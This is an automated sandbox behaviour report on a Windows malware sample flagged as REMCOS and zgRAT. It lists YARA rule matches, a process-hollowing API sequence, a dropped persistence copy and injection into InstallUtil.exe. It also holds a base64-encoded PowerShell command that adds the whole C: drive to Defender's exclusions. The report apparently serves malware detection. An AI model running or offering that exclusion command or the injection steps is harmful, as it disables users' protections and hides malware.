Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Matched rules INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer (author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe) and REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda). Both rules matched on each of the following sources:
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Matched rule MALWARE_Win_zgRAT (author = ditekSHen, description = Detects zgRAT) on each of the following sources:
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 004310BE appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 00402053 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 00431740 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00414EA8 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle, 17_2_00414EA8
Source: kyFBQxVbsg.exe, 00000000.00000002.540743790.0000000003687000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000000.371796335.0000000000392000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe Binary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Qerdo.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: kyFBQxVbsg.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe File created: C:\Users\user\AppData\Roaming\Ppjollp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/10@117/1
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 17_2_004172C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00417CBB FindResourceA,LoadResource,LockResource,SizeofResource, 17_2_00417CBB
Source: kyFBQxVbsg.exe Virustotal: Detection: 46%
Source: kyFBQxVbsg.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe File read: C:\Users\user\Desktop\kyFBQxVbsg.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\kyFBQxVbsg.exe "C:\Users\user\Desktop\kyFBQxVbsg.exe"
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
